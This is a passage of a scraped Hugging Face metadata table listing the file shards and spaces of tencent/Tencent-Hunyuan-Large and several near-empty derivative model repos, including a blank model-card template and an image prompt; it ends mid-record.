""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/hy.tiktoken', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/modeling_hunyuan.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00001-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00002-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00003-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00004-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00005-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00006-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00007-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00008-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00009-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00010-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00011-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00012-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00013-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00014-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00015-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00016-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00017-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00018-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00019-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00020-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00021-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00022-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00023-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00024-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00025-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00026-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00027-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00028-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00029-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00030-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00031-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00032-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00033-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00034-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00035-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00036-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00037-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00038-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00039-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00040-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00041-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00042-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00043-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00044-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00045-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00046-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00047-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00048-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00049-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00050-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00051-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00052-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00053-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00054-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00055-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00056-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00057-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00058-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00059-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00060-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00061-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00062-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00063-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00064-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00065-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00066-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00067-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00068-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00069-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00070-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00071-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00072-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00073-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00074-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00075-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00076-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00077-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00078-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00079-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model-00080-of-00080.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/pytorch_model.bin.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/test.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/test4consistent.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/tokenization_hy.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Pretrain/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='LICENSE.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Notice', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""kali99066/tencent-Tencent-Hunyuan-Large"", ""QuiteBitter/tencent-Tencent-Hunyuan-Large"", ""kangyuliu/tencent-Tencent-Hunyuan-Large"", ""w1166en/tencent-Tencent-Hunyuan-Large"", ""eberhenriquez94/tencent-Tencent-Hunyuan-Large"", ""ernie565/tencent-Tencent-Hunyuan-Large"", ""Dmtlant/tencent-Tencent-Hunyuan-Large"", ""RomanRG008/tencent-Tencent-Hunyuan-Large"", ""elsh2001/tencent-Tencent-Hunyuan-Large"", ""RomanRG008/tencent-Tencent-Hunyuan-Large-new"", ""Thetutorcyber/tencent-Tencent-Hunyuan-Large"", ""zhzabcd/tencent-Tencent-Hunyuan-Large"", ""salehelatawy/tencent-Tencent-Hunyuan-Large"", ""hunt616/tencent-Tencent-Hunyuan-Large"", ""seowizardagency/tencent-Tencent-Hunyuan-Large"", ""MohamedMostafa1986/tencent-Tencent-Hunyuan-Large"", ""awayers/tencent-Tencent-Hunyuan-Large"", ""fomafoma/UltimatePrompt"", ""Konst2021/tencent-Tencent-Hunyuan-Large"", ""Sethskyler/tencent"", ""gk1d/tencent-Tencent-Hunyuan-Large"", ""yordyi/tencent-Tencent-Hunyuan-Large"", ""khenjy/tencent-Tencent-Hunyuan-Large"", ""windhw/tencent-Tencent-Hunyuan-Large"", ""gdnjr5233-YOLOer/Tencent-Hunyua-Large-Streamlit-Demo"", ""JohnJohnnyJohn/tencent-Tencent-Hunyuan-Large"", ""S2pidhere/tencent-Tencent-Hunyuan-Large"", ""MarlonMorales/tencent-Tencent-Hunyuan-Large"", ""devanshsingh2199/customllm""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-01-19 05:30:33+00:00"", ""cardData"": ""language:\n- en\nlibrary_name: transformers\nlicense: other\nlicense_name: tencent-license\nlicense_link: https://huggingface.co/tencent/Tencent-Hunyuan-Large/blob/main/LICENSE.txt\npipeline_tag: text-generation"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""6717b638c54ec650f7ab021d"", ""modelId"": ""tencent/Tencent-Hunyuan-Large"", ""usedStorage"": 3895680282804}",0,"https://huggingface.co/MuriloSOliveira1/MuriloSOliveira, https://huggingface.co/musasa121/gta, https://huggingface.co/ArthurXyz/ThurAssist, https://huggingface.co/roseb7d/HFOpenAI",4,https://huggingface.co/BATSCIENCE/BATSOUNDS,1,,0,,0,"Dmtlant/tencent-Tencent-Hunyuan-Large, QuiteBitter/tencent-Tencent-Hunyuan-Large, RomanRG008/tencent-Tencent-Hunyuan-Large, RomanRG008/tencent-Tencent-Hunyuan-Large-new, Thetutorcyber/tencent-Tencent-Hunyuan-Large, eberhenriquez94/tencent-Tencent-Hunyuan-Large, elsh2001/tencent-Tencent-Hunyuan-Large, ernie565/tencent-Tencent-Hunyuan-Large, huggingface/InferenceSupport/discussions/new?title=tencent/Tencent-Hunyuan-Large&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Btencent%2FTencent-Hunyuan-Large%5D(%2Ftencent%2FTencent-Hunyuan-Large)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, kali99066/tencent-Tencent-Hunyuan-Large, kangyuliu/tencent-Tencent-Hunyuan-Large, tencent/Hunyuan-Large, w1166en/tencent-Tencent-Hunyuan-Large, zhzabcd/tencent-Tencent-Hunyuan-Large",14
|
| 166 |
+
MuriloSOliveira1/MuriloSOliveira,"---
|
| 167 |
+
license: llama3.2
|
| 168 |
+
language:
|
| 169 |
+
- pt
|
| 170 |
+
base_model:
|
| 171 |
+
- tencent/Tencent-Hunyuan-Large
|
| 172 |
+
---
|
| 173 |
+
# Model Card for Model ID
|
| 174 |
+
|
| 175 |
+
<!-- Provide a quick summary of what the model is/does. -->
|
| 176 |
+
|
| 177 |
+
This modelcard aims to be a base template for new models. It has been generated using [this raw template](https://github.com/huggingface/huggingface_hub/blob/main/src/huggingface_hub/templates/modelcard_template.md?plain=1).
|
| 178 |
+
|
| 179 |
+
## Model Details
|
| 180 |
+
|
| 181 |
+
### Model Description
|
| 182 |
+
|
| 183 |
+
<!-- Provide a longer summary of what this model is. -->
|
| 184 |
+
|
| 185 |
+
|
| 186 |
+
|
| 187 |
+
- **Developed by:** [More Information Needed]
|
| 188 |
+
- **Funded by [optional]:** [More Information Needed]
|
| 189 |
+
- **Shared by [optional]:** [More Information Needed]
|
| 190 |
+
- **Model type:** [More Information Needed]
|
| 191 |
+
- **Language(s) (NLP):** [More Information Needed]
|
| 192 |
+
- **License:** [More Information Needed]
|
| 193 |
+
- **Finetuned from model [optional]:** [More Information Needed]
|
| 194 |
+
|
| 195 |
+
### Model Sources [optional]
|
| 196 |
+
|
| 197 |
+
<!-- Provide the basic links for the model. -->
|
| 198 |
+
|
| 199 |
+
- **Repository:** [More Information Needed]
|
| 200 |
+
- **Paper [optional]:** [More Information Needed]
|
| 201 |
+
- **Demo [optional]:** [More Information Needed]
|
| 202 |
+
|
| 203 |
+
## Uses
|
| 204 |
+
|
| 205 |
+
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
|
| 206 |
+
|
| 207 |
+
### Direct Use
|
| 208 |
+
|
| 209 |
+
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
|
| 210 |
+
|
| 211 |
+
[More Information Needed]
|
| 212 |
+
|
| 213 |
+
### Downstream Use [optional]
|
| 214 |
+
|
| 215 |
+
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
|
| 216 |
+
|
| 217 |
+
[More Information Needed]
|
| 218 |
+
|
| 219 |
+
### Out-of-Scope Use
|
| 220 |
+
|
| 221 |
+
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
|
| 222 |
+
|
| 223 |
+
[More Information Needed]
|
| 224 |
+
|
| 225 |
+
## Bias, Risks, and Limitations
|
| 226 |
+
|
| 227 |
+
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
|
| 228 |
+
|
| 229 |
+
[More Information Needed]
|
| 230 |
+
|
| 231 |
+
### Recommendations
|
| 232 |
+
|
| 233 |
+
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
|
| 234 |
+
|
| 235 |
+
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
|
| 236 |
+
|
| 237 |
+
## How to Get Started with the Model
|
| 238 |
+
|
| 239 |
+
Use the code below to get started with the model.
|
| 240 |
+
|
| 241 |
+
[More Information Needed]
|
| 242 |
+
|
| 243 |
+
## Training Details
|
| 244 |
+
|
| 245 |
+
### Training Data
|
| 246 |
+
|
| 247 |
+
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
|
| 248 |
+
|
| 249 |
+
[More Information Needed]
|
| 250 |
+
|
| 251 |
+
### Training Procedure
|
| 252 |
+
|
| 253 |
+
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
|
| 254 |
+
|
| 255 |
+
#### Preprocessing [optional]
|
| 256 |
+
|
| 257 |
+
[More Information Needed]
|
| 258 |
+
|
| 259 |
+
|
| 260 |
+
#### Training Hyperparameters
|
| 261 |
+
|
| 262 |
+
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
|
| 263 |
+
|
| 264 |
+
#### Speeds, Sizes, Times [optional]
|
| 265 |
+
|
| 266 |
+
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
|
| 267 |
+
|
| 268 |
+
[More Information Needed]
|
| 269 |
+
|
| 270 |
+
## Evaluation
|
| 271 |
+
|
| 272 |
+
<!-- This section describes the evaluation protocols and provides the results. -->
|
| 273 |
+
|
| 274 |
+
### Testing Data, Factors & Metrics
|
| 275 |
+
|
| 276 |
+
#### Testing Data
|
| 277 |
+
|
| 278 |
+
<!-- This should link to a Dataset Card if possible. -->
|
| 279 |
+
|
| 280 |
+
[More Information Needed]
|
| 281 |
+
|
| 282 |
+
#### Factors
|
| 283 |
+
|
| 284 |
+
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
|
| 285 |
+
|
| 286 |
+
[More Information Needed]
|
| 287 |
+
|
| 288 |
+
#### Metrics
|
| 289 |
+
|
| 290 |
+
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
|
| 291 |
+
|
| 292 |
+
[More Information Needed]
|
| 293 |
+
|
| 294 |
+
### Results
|
| 295 |
+
|
| 296 |
+
[More Information Needed]
|
| 297 |
+
|
| 298 |
+
#### Summary
|
| 299 |
+
|
| 300 |
+
|
| 301 |
+
|
| 302 |
+
## Model Examination [optional]
|
| 303 |
+
|
| 304 |
+
<!-- Relevant interpretability work for the model goes here -->
|
| 305 |
+
|
| 306 |
+
[More Information Needed]
|
| 307 |
+
|
| 308 |
+
## Environmental Impact
|
| 309 |
+
|
| 310 |
+
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
|
| 311 |
+
|
| 312 |
+
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
|
| 313 |
+
|
| 314 |
+
- **Hardware Type:** [More Information Needed]
|
| 315 |
+
- **Hours used:** [More Information Needed]
|
| 316 |
+
- **Cloud Provider:** [More Information Needed]
|
| 317 |
+
- **Compute Region:** [More Information Needed]
|
| 318 |
+
- **Carbon Emitted:** [More Information Needed]
|
| 319 |
+
|
| 320 |
+
## Technical Specifications [optional]
|
| 321 |
+
|
| 322 |
+
### Model Architecture and Objective
|
| 323 |
+
|
| 324 |
+
[More Information Needed]
|
| 325 |
+
|
| 326 |
+
### Compute Infrastructure
|
| 327 |
+
|
| 328 |
+
[More Information Needed]
|
| 329 |
+
|
| 330 |
+
#### Hardware
|
| 331 |
+
|
| 332 |
+
[More Information Needed]
|
| 333 |
+
|
| 334 |
+
#### Software
|
| 335 |
+
|
| 336 |
+
[More Information Needed]
|
| 337 |
+
|
| 338 |
+
## Citation [optional]
|
| 339 |
+
|
| 340 |
+
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
|
| 341 |
+
|
| 342 |
+
**BibTeX:**
|
| 343 |
+
|
| 344 |
+
[More Information Needed]
|
| 345 |
+
|
| 346 |
+
**APA:**
|
| 347 |
+
|
| 348 |
+
[More Information Needed]
|
| 349 |
+
|
| 350 |
+
## Glossary [optional]
|
| 351 |
+
|
| 352 |
+
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
|
| 353 |
+
|
| 354 |
+
[More Information Needed]
|
| 355 |
+
|
| 356 |
+
## More Information [optional]
|
| 357 |
+
|
| 358 |
+
[More Information Needed]
|
| 359 |
+
|
| 360 |
+
## Model Card Authors [optional]
|
| 361 |
+
|
| 362 |
+
[More Information Needed]
|
| 363 |
+
|
| 364 |
+
## Model Card Contact
|
| 365 |
+
|
| 366 |
+
[More Information Needed]","{""id"": ""MuriloSOliveira1/MuriloSOliveira"", ""author"": ""MuriloSOliveira1"", ""sha"": ""bfb621493235f3f0d249fcb5de7fb7064ec2cee0"", ""last_modified"": ""2024-11-06 19:34:22+00:00"", ""created_at"": ""2024-11-06 19:27:44+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""pt"", ""arxiv:1910.09700"", ""base_model:tencent/Tencent-Hunyuan-Large"", ""base_model:finetune:tencent/Tencent-Hunyuan-Large"", ""license:llama3.2"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- tencent/Tencent-Hunyuan-Large\nlanguage:\n- pt\nlicense: llama3.2"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-11-06 19:34:22+00:00"", ""cardData"": ""base_model:\n- tencent/Tencent-Hunyuan-Large\nlanguage:\n- pt\nlicense: llama3.2"", ""transformersInfo"": null, ""_id"": ""672bc330359d27c87942184f"", ""modelId"": ""MuriloSOliveira1/MuriloSOliveira"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=MuriloSOliveira1/MuriloSOliveira&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BMuriloSOliveira1%2FMuriloSOliveira%5D(%2FMuriloSOliveira1%2FMuriloSOliveira)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 367 |
+
musasa121/gta,"---
|
| 368 |
+
base_model:
|
| 369 |
+
- tencent/Tencent-Hunyuan-Large
|
| 370 |
+
---
|
| 371 |
+
""Photorealistic portrait of a middle-aged man, Michael De Santa from GTA V, Caucasian male, 48 years old, slicked-back dark brown hair, with a sharp jawline and slightly tired eyes, wearing a tailored dark gray suit with a white shirt, standing confidently with a city skyline in the background illuminated by purple and cyan neon lights. His expression is calm yet calculating, with faint wrinkles around his eyes and a hint of stubble, lit with cinematic lighting and dramatic shadows. Ultra-detailed face, realistic skin texture, and dynamic depth of field.""","{""id"": ""musasa121/gta"", ""author"": ""musasa121"", ""sha"": ""42dc01b3eaf8a7af876d7c678f549caab7930abf"", ""last_modified"": ""2024-11-26 09:43:18+00:00"", ""created_at"": ""2024-11-26 09:42:27+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""base_model:tencent/Tencent-Hunyuan-Large"", ""base_model:finetune:tencent/Tencent-Hunyuan-Large"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- tencent/Tencent-Hunyuan-Large"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-11-26 09:43:18+00:00"", ""cardData"": ""base_model:\n- tencent/Tencent-Hunyuan-Large"", ""transformersInfo"": null, ""_id"": ""67459803334ae6264bc573e6"", ""modelId"": ""musasa121/gta"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=musasa121/gta&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bmusasa121%2Fgta%5D(%2Fmusasa121%2Fgta)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 372 |
+
ArthurXyz/ThurAssist,"---
|
| 373 |
+
license: apache-2.0
|
| 374 |
+
datasets:
|
| 375 |
+
- O1-OPEN/OpenO1-SFT
|
| 376 |
+
base_model:
|
| 377 |
+
- tencent/Tencent-Hunyuan-Large
|
| 378 |
+
new_version: tencent/Tencent-Hunyuan-Large
|
| 379 |
+
---","{""id"": ""ArthurXyz/ThurAssist"", ""author"": ""ArthurXyz"", ""sha"": ""a2c72376147d309e161dc8483f622184e46956d3"", ""last_modified"": ""2024-12-01 12:58:19+00:00"", ""created_at"": ""2024-12-01 12:55:41+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""dataset:O1-OPEN/OpenO1-SFT"", ""base_model:tencent/Tencent-Hunyuan-Large"", ""base_model:finetune:tencent/Tencent-Hunyuan-Large"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- tencent/Tencent-Hunyuan-Large\ndatasets:\n- O1-OPEN/OpenO1-SFT\nlicense: apache-2.0\nnew_version: tencent/Tencent-Hunyuan-Large"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-12-01 12:58:19+00:00"", ""cardData"": ""base_model:\n- tencent/Tencent-Hunyuan-Large\ndatasets:\n- O1-OPEN/OpenO1-SFT\nlicense: apache-2.0\nnew_version: tencent/Tencent-Hunyuan-Large"", ""transformersInfo"": null, ""_id"": ""674c5ccde26152d83defd61c"", ""modelId"": ""ArthurXyz/ThurAssist"", ""usedStorage"": 